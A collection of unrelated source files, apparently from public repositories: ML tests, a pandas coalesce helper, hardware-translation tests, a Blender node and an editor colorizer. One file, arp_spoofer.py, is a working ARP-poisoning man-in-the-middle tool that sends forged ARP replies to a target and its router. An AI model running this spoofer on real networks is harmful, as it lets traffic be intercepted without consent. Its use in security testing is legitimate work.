if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
|
zippy/edu.uci.python.test/src/tests/generator-yield-expression-test.py | lucapele/pele-c | 319 | 11178178 | <reponame>lucapele/pele-c<filename>zippy/edu.uci.python.test/src/tests/generator-yield-expression-test.py
# zwei 06/28/2014
# generator that yields a built-in constructor with a generator expression argument
def generator(n):
for i in range(n):
x = yield i * 2
print(x)
gen = generator(5)
it = 0
gen.__next__()
try:
while True:
gen.send(it)
it += 1
except StopIteration:
pass |
test/layers/operations/test_norm.py | dawnclaude/onnx2keras | 115 | 11178195 | import torch.nn as nn
import torch
import numpy as np
import pytest
from test.utils import convert_and_test
class FNormTest(nn.Module):
"""
Test for nn.functional types
"""
def __init__(self, dim, keepdim):
super(FNormTest, self).__init__()
self.dim = dim
self.keepdim = keepdim
def forward(self, x):
x = torch.norm(x, p=2, dim=self.dim, keepdim=self.keepdim)
return x
# TODO: Not working with dim=[2,3] and change_ordering=False ???? error about 0.0001-0.001
@pytest.mark.repeat(10)
@pytest.mark.parametrize('change_ordering', [True, False])
@pytest.mark.parametrize('dim', [[1, 2], [1, 3]])
@pytest.mark.parametrize('epsilon', [5e-5])
@pytest.mark.parametrize('keepdim', [True, False])
def test_norm(change_ordering, dim, epsilon, keepdim):
model = FNormTest(dim, keepdim)
model.eval()
input_np = np.random.uniform(0, 1, (1, 3, 224, 224))
error = convert_and_test(model, input_np, verbose=False, change_ordering=change_ordering, epsilon=epsilon)
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/src/activation/relu.py | angliu-bu/ILearnDeepLearning.py | 1,093 | 11178206 | <reponame>angliu-bu/ILearnDeepLearning.py<gh_stars>1000+
import numpy as np
from src.base import Layer
class ReluLayer(Layer):
def __init__(self):
self._z = None
def forward_pass(self, a_prev: np.array, training: bool) -> np.array:
"""
:param a_prev - ND tensor with shape (n, ..., channels)
:output ND tensor with shape (n, ..., channels)
------------------------------------------------------------------------
n - number of examples in batch
"""
self._z = np.maximum(0, a_prev)
return self._z
def backward_pass(self, da_curr: np.array) -> np.array:
"""
:param da_curr - ND tensor with shape (n, ..., channels)
:output ND tensor with shape (n, ..., channels)
------------------------------------------------------------------------
n - number of examples in batch
"""
dz = np.array(da_curr, copy=True)
dz[self._z <= 0] = 0
return dz
|
blender/arm/logicnode/animation/LN_set_bone_fk_ik_only.py | onelsonic/armory | 2,583 | 11178216 | <filename>blender/arm/logicnode/animation/LN_set_bone_fk_ik_only.py
from arm.logicnode.arm_nodes import *
class SetBoneFkIkOnlyNode(ArmLogicTreeNode):
"""Set particular bone to be animated by Forward kinematics or Inverse kinematics only. All other animations will be ignored"""
bl_idname = 'LNSetBoneFkIkOnlyNode'
bl_label = 'Set Bone FK IK Only'
arm_version = 1
arm_section = 'armature'
def arm_init(self, context):
self.add_input('ArmNodeSocketAction', 'In')
self.add_input('ArmNodeSocketObject', 'Object')
self.add_input('ArmStringSocket', 'Bone')
self.add_input('ArmBoolSocket', 'FK or IK only')
self.add_output('ArmNodeSocketAction', 'Out')
|
docpkg/config.py | icgood/continuous-docs | 336 | 11178228 | <filename>docpkg/config.py
"""This module contains the configuration routines."""
from typing import Optional, TypeVar
T = TypeVar('T')
class MyConfig:
"""Loads and manages the configuration.
Args:
filename: The filename to load configs from.
"""
def __init__(self, filename: str) -> None:
pass
def get_option(self, name: str, default: Optional[T] = None) -> T:
"""Returns the requested option from the loaded configs.
:param name: The option name to get.
:param default: The default to return, if the option was not found
in the configs.
"""
pass
|
janitor/functions/coalesce.py | farhanreynaldo/pyjanitor | 674 | 11178261 | from typing import Optional, Union
import pandas as pd
import pandas_flavor as pf
from janitor.utils import check, deprecated_alias
from janitor.functions.utils import _select_column_names
@pf.register_dataframe_method
@deprecated_alias(columns="column_names", new_column_name="target_column_name")
def coalesce(
df: pd.DataFrame,
*column_names,
target_column_name: Optional[str] = None,
default_value: Optional[Union[int, float, str]] = None,
) -> pd.DataFrame:
"""
Coalesce two or more columns of data in order of column names provided.
This finds the first non-missing value at each position.
This method does not mutate the original DataFrame.
TODO: Turn the example in this docstring into a Jupyter notebook.
Example:
```python
import pandas as pd
import janitor as jn
df = pd.DataFrame({"A": [1, 2, np.nan],
"B": [np.nan, 10, np.nan],
"C": [5, 10, 7]})
A B C
0 1.0 NaN 5
1 2.0 10.0 10
2 NaN NaN 7
df.coalesce('A', 'B', 'C',
target_column_name = 'D')
A B C D
0 1.0 NaN 5 1.0
1 2.0 10.0 10 2.0
2 NaN NaN 7 7.0
```
If no target column is provided, then the first column is updated,
with the null values removed:
```python
df.coalesce('A', 'B', 'C')
A B C
0 1.0 NaN 5
1 2.0 10.0 10
2 7.0 NaN 7
```
If nulls remain, you can fill it with the `default_value`:
```python
df = pd.DataFrame({'s1':[np.nan,np.nan,6,9,9],
's2':[np.nan,8,7,9,9]})
s1 s2
0 NaN NaN
1 NaN 8.0
2 6.0 7.0
3 9.0 9.0
4 9.0 9.0
df.coalesce('s1', 's2',
target_column_name = 's3',
default_value = 0)
s1 s2 s3
0 NaN NaN 0.0
1 NaN 8.0 8.0
2 6.0 7.0 6.0
3 9.0 9.0 9.0
4 9.0 9.0 9.0
```
Functional usage syntax:
```python
df = coalesce(df, 'col1', 'col2', target_column_name ='col3')
```
Method chaining syntax:
```python
import pandas as pd
import janitor
df = pd.DataFrame(...).coalesce('col1', 'col2')
```
The first example will create a new column called `col3` with values from
`col2` inserted where values from `col1` are `NaN`.
The second example will update the values of `col1`,
since it is the first column in `column_names`.
This is more syntactic diabetes! For R users, this should look familiar to
`dplyr`'s `coalesce` function; for Python users, the interface
should be more intuitive than the `pandas.Series.combine_first`
method.
:param df: A pandas DataFrame.
:param column_names: A list of column names.
:param target_column_name: The new column name after combining.
If `None`, then the first column in `column_names` is updated,
with the Null values replaced.
:param default_value: A scalar to replace any remaining nulls
after coalescing.
:returns: A pandas DataFrame with coalesced columns.
:raises ValueError: if length of `column_names` is less than 2.
"""
if not column_names:
return df
if len(column_names) < 2:
raise ValueError(
"""
The number of columns to coalesce
should be a minimum of 2.
"""
)
column_names = [*column_names]
column_names = _select_column_names(column_names, df)
if target_column_name:
check("target_column_name", target_column_name, [str])
if default_value:
check("default_value", default_value, [int, float, str])
if target_column_name is None:
target_column_name = column_names[0]
# bfill/ffill combo is faster than combine_first
outcome = (
df.filter(column_names)
.bfill(axis="columns")
.ffill(axis="columns")
.iloc[:, 0]
)
if outcome.hasnans and (default_value is not None):
outcome = outcome.fillna(default_value)
return df.assign(**{target_column_name: outcome})
|
pymtl3/passes/backends/verilog/test/TranslationImport_adhoc_test.py | jbrzozo24/pymtl3 | 152 | 11178277 | <filename>pymtl3/passes/backends/verilog/test/TranslationImport_adhoc_test.py
#=========================================================================
# TranslationImport_adhoc_test.py
#=========================================================================
# Author : <NAME>
# Date : Jun 5, 2019
"""Test ad-hoc components with SystemVerilog translation and import."""
import pytest
from pymtl3.datatypes import Bits16, Bits32, bitstruct, concat
from pymtl3.dsl import Component, InPort, Interface, OutPort, update
from pymtl3.passes.backends.verilog import VerilogPlaceholderPass
from pymtl3.passes.rtlir.util.test_utility import get_parameter
from pymtl3.stdlib.test_utils import TestVectorSimulator
from .. import VerilogTranslationImportPass
from ..testcases import (
CaseChildExplicitModuleName,
CaseMultiPlaceholderImport,
CasePlaceholderTranslationRegIncr,
CasePlaceholderTranslationVReg,
CaseVIncludePopulation,
CaseVLibsTranslation,
)
from ..translation.behavioral.test.VBehavioralTranslatorL1_test import (
test_verilog_behavioral_L1,
)
from ..translation.behavioral.test.VBehavioralTranslatorL2_test import (
test_verilog_behavioral_L2,
)
from ..translation.behavioral.test.VBehavioralTranslatorL3_test import (
test_verilog_behavioral_L3,
)
from ..translation.behavioral.test.VBehavioralTranslatorL4_test import (
test_verilog_behavioral_L4,
)
from ..translation.behavioral.test.VBehavioralTranslatorL5_test import (
test_verilog_behavioral_L5,
)
from ..translation.structural.test.VStructuralTranslatorL1_test import (
test_verilog_structural_L1,
)
from ..translation.structural.test.VStructuralTranslatorL2_test import (
test_verilog_structural_L2,
)
from ..translation.structural.test.VStructuralTranslatorL3_test import (
test_verilog_structural_L3,
)
from ..translation.structural.test.VStructuralTranslatorL4_test import (
test_verilog_structural_L4,
)
def run_test( case ):
_m = case.DUT()
_m.elaborate()
_m.set_metadata( VerilogTranslationImportPass.enable, True )
_m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( _m )
sim = TestVectorSimulator( m, case.TV, case.TV_IN, case.TV_OUT )
sim.run_test()
@pytest.mark.parametrize(
'case', get_parameter('case', test_verilog_behavioral_L1) + \
get_parameter('case', test_verilog_behavioral_L2) + \
get_parameter('case', test_verilog_behavioral_L3) + \
get_parameter('case', test_verilog_behavioral_L4) + \
get_parameter('case', test_verilog_behavioral_L5) + \
get_parameter('case', test_verilog_structural_L1) + \
get_parameter('case', test_verilog_structural_L2) + \
get_parameter('case', test_verilog_structural_L3) + \
get_parameter('case', test_verilog_structural_L4) + [
CasePlaceholderTranslationVReg,
CasePlaceholderTranslationRegIncr,
CaseVIncludePopulation,
CaseVLibsTranslation,
CaseChildExplicitModuleName,
]
)
def test_verilog_translation_import_adhoc( case ):
run_test( case )
def test_pymtl_top_multi_placeholder():
case = CaseMultiPlaceholderImport
m = case.DUT()
m.elaborate()
m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( m )
sim = TestVectorSimulator( m, case.TV, case.TV_IN, case.TV_OUT )
sim.run_test()
def test_bitstruct_same_name_different_fields():
class A:
@bitstruct
class A:
a: Bits32
class B:
@bitstruct
class A:
a: Bits16
class InIfc( Interface ):
def construct( s, Type ):
s.in_ = InPort( Type )
class OutIfc( Interface ):
def construct( s, Type ):
s.out = OutPort( Type )
class DUT( Component ):
def construct( s ):
s.in1 = InIfc(A.A)
s.in2 = InIfc(B.A)
s.out2 = OutPort(Bits16)
s.out2 //= s.in2.in_.a
class TMP( Component ):
def construct( s ):
s.out = OutPort(B.A)
@update
def drive():
s.out @= 0
class Top( Component ):
def construct( s ):
s.dut = DUT()
s.tmp = TMP()
s.tmp.out //= s.dut.in2.in_
m = Top()
m.elaborate()
m.dut.set_metadata( VerilogTranslationImportPass.enable, True )
m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( m )
m.dut.finalize()
|
src/lib/attacks/arp_spoof/arp_spoofer.py | FrancescoPenasa/vault_scanner | 230 | 11178293 | #! /usr/bin/python
import subprocess
import os
import re
import colors
import sys
import time
import scapy.all as scapy
from io import StringIO
class ARPSpoof(object):
def __init__(self, ip=None):
self.target_ip = None
self.router_ip = None
self.target_mac = None
self.router_mac = None
self.no_of_packets = 0
self.INTER = 0.5
self.is_root()
if ip is not None:
self.target_ip = ip
else:
self.get_target_IP()
if self.router_ip is None:
self.get_router_IP()
if self.target_mac is None:
self.target_mac = self.getMAC(self.target_ip, 'TARGET')
if self.router_mac is None:
self.router_mac = self.getMAC(self.router_ip, 'ROUTER')
@staticmethod
def is_root():
"""
Checks if program is running as root or not
"""
if os.geteuid() != 0:
colors.error('Please run as root')
sys.exit(1)
else:
colors.success('Running as root')
@staticmethod
def validateIP(ip: str):
"""
Check whether the input IP is valid or not
"""
if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'
'(\.(?!$)|$)){4}$', ip):
return True
@staticmethod
def validateMAC(mac):
"""
Check whether the input MAC is valid or not
"""
if re.match("[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$",
mac.lower()):
return True
@staticmethod
def capture_output(to_perform):
capture = StringIO()
temp_stdout = sys.stdout
sys.stdout = capture
to_perform.show()
sys.stdout = temp_stdout
return capture.getvalue()
def get_router_IP(self):
"""
Finds the router IP address
"""
colors.info('Finding Router IP address...')
command_process = subprocess.Popen(['route', '-n'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, error = command_process.communicate()
if error:
print(error.decode('utf-8'))
sys.exit(1)
output = output.decode('utf-8')
ip_candidates = re.findall(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b",
output)
colors.success('Router IP found is : {}'.format(ip_candidates[1]))
val = str(input('>> Continue with this IP address(Y/y)'
'or enter a different IP address : ')).strip()
if val == 'Y' or val == 'y':
self.router_ip = ip_candidates[1]
colors.info('Router IP set to : {}'.format(self.router_ip))
elif self.validateIP(val):
self.router_ip = val
colors.info('Router IP set to : {}'.format(self.router_ip))
else:
colors.error('Please enter a valid Router IP address')
self.get_router_IP()
def get_target_IP(self):
"""
Fetches target IP to spoof
"""
if self.target_ip is None:
value = str(input('>> No target IP selected, please enter an IP '
'address or run network scan (Enter "S/s") : '
)).strip()
if value == 'S' or value == 's':
self.networkScan()
elif self.validateIP(value):
colors.info('Selected target IP is : {}'.format(value))
self.target_ip = value
else:
colors.error('Please enter a valid IP address to continue...')
self.get_target_IP()
def getMAC(self, IP, name):
"""
Fetches MAC address of the selected IP
"""
arp_packet = scapy.ARP(pdst=IP)
broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_broadcast = broadcast/arp_packet
broadcast = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]
mac_addr_str = self.capture_output(broadcast)
mac_addr = re.findall(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w',
mac_addr_str)[0]
mac_addr = str(mac_addr).strip()
colors.success('Found MAC address for {} : {} is : {}'
.format(name, IP, mac_addr))
val = str(input('>> Enter(Y/y) to continue or enter MAC address : '))\
.strip()
if val == 'Y' or val == 'y':
return mac_addr
elif self.validateMAC(val):
colors.info('Setting MAC address for {} : {} : {}'
.format(name, IP, val))
return val
else:
colors.error('Please enter a valid MAC address...')
self.getMAC(IP, name)
def networkScan(self):
"""
Peform ARP scanning over the IP range
"""
ip = str(input('>> Enter the IP address to start scanning : '))\
.strip()
if self.validateIP(ip):
try:
colors.info('Initiating ARP Scan')
from lib.scanner.ip_scanner import arp_scanner
arpScanObj = arp_scanner.ARPScan(ip=ip,
start_ip=None,
end_ip=None,
threads=50)
total_index, result_dict = arpScanObj.threadingScan()
index = -1
while index > total_index or index <= 0:
index = int(input('>> Enter the index of the target IP: '))
self.target_ip = result_dict[index][0]
self.target_mac = result_dict[index][1]
colors.success('Target IP set to: {}'.format(self.target_ip))
colors.success('Target MAC set to: {}'.format(self.target_mac))
except ImportError:
colors.error('Could not import the required module.')
except Exception as e:
print(e)
else:
colors.error('Please enter a valid IP address...')
self.networkScan()
def generatePacket(self):
"""
Generates scapy packet for spoofing
the target and the router
"""
target_arp_packet = scapy.ARP(op=2, hwdst=self.target_mac,
pdst=self.target_ip, psrc=self.router_ip)
router_arp_packet = scapy.ARP(op=2, hwdst=self.router_mac,
pdst=self.router_ip, psrc=self.target_ip)
return target_arp_packet, router_arp_packet
def restore(self):
"""
Restores the IP tables of the target and the router
to the default state (before ARP spoof attack)
"""
colors.info('Restoring IP tables')
target_arp_packet = scapy.ARP(op=2, pdst=self.target_ip,
hwdst=self.target_mac,
psrc=self.router_ip,
hwsrc=self.router_mac)
router_arp_packet = scapy.ARP(op=2, pdst=self.router_ip,
hwdst=self.router_mac,
psrc=self.target_ip,
hwsrc=self.target_mac)
COUNT = 10 # Send 10 packets to restore
while COUNT > 0:
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
COUNT = COUNT - 1
colors.success('ARP Table restored')
def startSpoof(self):
"""
Starts ARP spoofing
"""
t1 = time.time()
colors.info('ARP Spoofing started...')
colors.info('Press CTRL+C to exit...')
try:
while True:
target_arp_packet, router_arp_packet = self.generatePacket()
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
self.no_of_packets = self.no_of_packets + 1
print('[+] Packets sent : {}'.format(self.no_of_packets),
end='\r')
time.sleep(self.INTER)
except KeyboardInterrupt:
colors.info('Stopping ARP spoof')
except Exception as e:
print(e)
finally:
self.restore()
t2 = time.time()
colors.success('ARP Spoof completed in : {}'.format(t2-t1))
|
leo/modes/scala.py | ATikhonov2/leo-editor | 1,550 | 11178323 | # Leo colorizer control file for scala mode.
# This file is in the public domain.
# Properties for scala mode.
properties = {
"commentEnd": "*/",
"commentStart": "/*",
"doubleBracketIndent": "false",
"indentCloseBrackets": "}",
"indentOpenBrackets": "{",
"indentPrevLine": "\\s*(((if|while)\\s*\\(|else\\s*(\\{|$)|else\\s+if\\s*\\(|case\\s+.+:|default:)[^;]*|for\\s*\\(.*)",
"indentSize": "2",
"lineComment": "//",
"lineUpClosingBracket": "true",
"noTabs": "true",
"tabSize": "2",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for scala_main ruleset.
scala_main_attributes_dict = {
"default": "null",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_primary ruleset.
scala_primary_attributes_dict = {
"default": "null",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_pattern ruleset.
scala_pattern_attributes_dict = {
"default": "NULL",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_scaladoc ruleset.
scala_scaladoc_attributes_dict = {
"default": "COMMENT3",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_scaladoc_pre ruleset.
scala_scaladoc_pre_attributes_dict = {
"default": "COMMENT3",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_tag ruleset.
scala_xml_tag_attributes_dict = {
"default": "LABEL",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_text ruleset.
scala_xml_text_attributes_dict = {
"default": "COMMENT4",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_comment ruleset.
scala_xml_comment_attributes_dict = {
"default": "COMMENT2",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for scala mode.
attributesDictDict = {
"scala_main": scala_main_attributes_dict,
"scala_pattern": scala_pattern_attributes_dict,
"scala_primary": scala_primary_attributes_dict,
"scala_scaladoc": scala_scaladoc_attributes_dict,
"scala_scaladoc_pre": scala_scaladoc_pre_attributes_dict,
"scala_xml_comment": scala_xml_comment_attributes_dict,
"scala_xml_tag": scala_xml_tag_attributes_dict,
"scala_xml_text": scala_xml_text_attributes_dict,
}
# Keywords dict for scala_main ruleset.
scala_main_keywords_dict = {}
# Keywords dict for scala_primary ruleset.
scala_primary_keywords_dict = {
### EKR
# "\t ": "",
# "\n": "",
# " ": "",
# " ": "",
"=": "",
">": "",
"Actor": "",
"ActorProxy": "",
"ActorTask": "",
"ActorThread": "",
"AllRef": "",
"Any": "",
"AnyRef": "",
"Application": "",
"AppliedType": "",
"Array": "",
"ArrayBuffer": "",
"Attribute": "",
"Boolean": "",
"BoxedArray": "",
"BoxedBooleanArray": "",
"BoxedByteArray": "",
"BoxedCharArray": "",
"Buffer": "",
"BufferedIterator": "",
"Byte": "",
"Char": "",
"Character": "",
"Console": "",
"Double": "",
"Enumeration": "",
"Float": "",
"Fluid": "",
"Function": "",
"IScheduler": "",
"ImmutableMapAdaptor": "",
"ImmutableSetAdaptor": "",
"Int": "",
"Integer": "",
"Iterable": "",
"List": "",
"Long": "",
"Nil": "",
"None": "",
"Option": "",
"Pair": "",
"PartialFunction": "",
"Pid": "",
"Predef": "",
"PriorityQueue": "",
"PriorityQueueProxy": "",
"Reaction": "",
"Ref": "",
"RemoteActor": "",
"Responder": "",
"RichInt": "",
"RichString": "",
"Rule": "",
"RuleTransformer": "",
"SUnit": "",
"ScalaRunTime": "",
"Scheduler": "",
"Script": "",
"Short": "",
"Some": "",
"Stream": "",
"String": "",
"Symbol": "",
"TIMEOUT": "",
"TcpService": "",
"TcpServiceWorker": "",
"TimerThread": "",
"Unit": "",
"WorkerThread": "",
"abstract": "",
"boolean": "",
"byte": "",
"case": "",
"catch": "",
"char": "",
"class": "",
"def": "",
"do": "",
"double": "",
"else": "",
"extends": "",
"false": "",
"final": "",
"finally": "",
"float": "",
"for": "",
"forSome": "",
"if": "",
"implicit": "",
"import": "",
"int": "",
"lazy": "",
"long": "",
"match": "",
"new": "",
"null": "",
"object": "",
"override": "",
"package": "",
"private": "",
"protected": "",
"requires": "",
"return": "",
"sealed": "",
"short": "",
"super": "",
"this": "",
"throw": "",
"trait": "",
"true": "",
"try": "",
"type": "",
"unit": "",
"val": "",
"var": "",
"while": "",
"with": "",
"yield": "",
}
# Keywords dict for scala_pattern ruleset.
scala_pattern_keywords_dict = {}
# Keywords dict for scala_scaladoc ruleset.
scala_scaladoc_keywords_dict = {
# "\n": "",
# " ": "",
# " ": "",
"@access": "",
"@author": "",
"@beaninfo": "",
"@bon": "",
"@bug": "",
"@complexity": "",
"@deprecated": "",
"@design": "",
"@docroot": "",
"@ensures": "",
"@equivalent": "",
"@example": "",
"@exception": "",
"@generates": "",
"@guard": "",
"@hides": "",
"@history": "",
"@idea": "",
"@invariant": "",
"@link": "",
"@modifies": "",
"@overrides": "",
"@param": "",
"@post": "",
"@pre": "",
"@references": "",
"@requires": "",
"@return": "",
"@review": "",
"@see": "",
"@serial": "",
"@serialData": "",
"@serialField": "",
"@serialdata": "",
"@serialfield": "",
"@since": "",
"@spec": "",
"@throws": "",
"@todo": "",
"@uses": "",
"@values": "",
"@version": "",
}
# Keywords dict for scala_scaladoc_pre ruleset.
scala_scaladoc_pre_keywords_dict = {}
# Keywords dict for scala_xml_tag ruleset.
scala_xml_tag_keywords_dict = {}
# Keywords dict for scala_xml_text ruleset.
scala_xml_text_keywords_dict = {}
# Keywords dict for scala_xml_comment ruleset.
scala_xml_comment_keywords_dict = {}
# Dictionary of keywords dictionaries for scala mode.
keywordsDictDict = {
"scala_main": scala_main_keywords_dict,
"scala_pattern": scala_pattern_keywords_dict,
"scala_primary": scala_primary_keywords_dict,
"scala_scaladoc": scala_scaladoc_keywords_dict,
"scala_scaladoc_pre": scala_scaladoc_pre_keywords_dict,
"scala_xml_comment": scala_xml_comment_keywords_dict,
"scala_xml_tag": scala_xml_tag_keywords_dict,
"scala_xml_text": scala_xml_text_keywords_dict,
}
# Rules for scala_main ruleset.
def scala_rule0(colorer, s, i):
return colorer.match_mark_following(s, i, kind="label", pattern="@",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
# Rules dict for scala_main ruleset.
rulesDict1 = {
"@": [scala_rule0,],
}
# Rules for scala_primary ruleset.
def scala_rule1(colorer, s, i):
return colorer.match_seq(s, i, kind="comment1", seq="/**/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="//",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def scala_rule3(colorer, s, i):
return colorer.match_span(s, i, kind="comment3", begin="/**", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::scaladoc",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="/*", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule5(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="<!--",
at_line_start=False, at_whitespace_end=True, at_word_start=False, delegate="scala::xml_comment")
def scala_rule6(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="<\\/?\\w*",
at_line_start=False, at_whitespace_end=True, at_word_start=False, delegate="scala::xml_tag")
def scala_rule7(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"\"\"", end="\"\"\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule8(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule9(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal1", regexp="'([^']|\\\\.)'",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule10(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="label", regexp="'[0-9a-zA-Z><=+]([0-9a-zA-Z><=+]|_[0-9a-zA-Z><=+])*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule11(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="\\[[^\\[\\]]*(\\[[^\\[\\]]*(\\[[^\\[\\]]*\\][^\\[\\]]*)*\\][^\\[\\]]*)*\\]",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule12(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp="<:\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule13(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp=">:\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="!",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule17(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule18(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">:",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule19(colorer, s, i):
